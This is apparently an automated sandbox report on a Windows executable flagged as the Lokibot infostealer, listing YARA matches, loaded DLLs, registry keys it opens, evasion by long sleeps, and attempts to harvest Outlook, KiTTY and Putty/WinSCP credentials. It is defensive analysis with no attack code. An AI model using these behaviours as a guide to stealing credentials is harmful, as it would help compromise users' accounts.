Source: 0.2.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000000.1442441088.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000000.1442462044.0000000000415000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: EozUxz4ybi.exe PID: 2884, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Code function: 0_2_0040549C		0_2_0040549C
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Code function: 0_2_004029D4		0_2_004029D4

Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Code function: String function: 00405B6F appears 41 times

Source: EozUxz4ybi.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: EozUxz4ybi.exe, type: SAMPLE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: EozUxz4ybi.exe, type: SAMPLE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: EozUxz4ybi.exe, type: SAMPLE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: EozUxz4ybi.exe, type: SAMPLE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: EozUxz4ybi.exe, type: SAMPLE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.0.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.0.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.0.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.0.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.0.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000000.1442441088.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000000.1442462044.0000000000415000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: EozUxz4ybi.exe PID: 2884, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/2@0/1

Source: C:\Users\user\Desktop\EozUxz4ybi.exe

Code function: 0_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,

0_2_0040650A

Source: C:\Users\user\Desktop\EozUxz4ybi.exe

Code function: 0_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,

0_2_0040434D

Source: C:\Users\user\Desktop\EozUxz4ybi.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\7ec63eecc011967c28496572961d2a7c_9e146be9-c76a-4720-bcdb-53011b87bd06

Jump to behavior

Source: C:\Users\user\Desktop\EozUxz4ybi.exe

Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C

Source: EozUxz4ybi.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\EozUxz4ybi.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: EozUxz4ybi.exe, 00000000.00000003.1443534413.0000000002105000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: EozUxz4ybi.exe	Virustotal: Detection: 86%
Source: EozUxz4ybi.exe	ReversingLabs: Detection: 100%

Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\EozUxz4ybi.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Data Obfuscation

Yara detected aPLib compressed binary

Source: Yara match	File source: EozUxz4ybi.exe, type: SAMPLE
Source: Yara match	File source: 0.0.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1442462044.0000000000415000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: EozUxz4ybi.exe PID: 2884, type: MEMORYSTR

Source: EozUxz4ybi.exe

Static PE information: section name: .x

Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Code function: 0_2_00402AC0 push eax; ret		0_2_00402AD4
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Code function: 0_2_00402AC0 push eax; ret		0_2_00402AFC

Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\EozUxz4ybi.exe TID: 1848	Thread sleep count: 88 > 30			Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe TID: 1848	Thread sleep time: -5280000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\EozUxz4ybi.exe

Code function: 0_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

0_2_00403D74

Source: C:\Users\user\Desktop\EozUxz4ybi.exe

Thread delayed: delay time: 60000

Jump to behavior

Source: EozUxz4ybi.exe, 00000000.00000002.2698954196.000000000056E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\EozUxz4ybi.exe

Code function: 0_2_0040317B mov eax, dword ptr fs:[00000030h]

0_2_0040317B

Source: C:\Users\user\Desktop\EozUxz4ybi.exe

Code function: 0_2_00402B7C GetProcessHeap,RtlAllocateHeap,

0_2_00402B7C

Source: C:\Users\user\Desktop\EozUxz4ybi.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\EozUxz4ybi.exe

Code function: 0_2_00406069 GetUserNameW,

0_2_00406069

Source: C:\Users\user\Desktop\EozUxz4ybi.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000000.00000002.2698954196.000000000056E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: EozUxz4ybi.exe PID: 2884, type: MEMORYSTR
Source: Yara match	File source: EozUxz4ybi.exe, type: SAMPLE
Source: Yara match	File source: 0.0.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1442462044.0000000000415000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
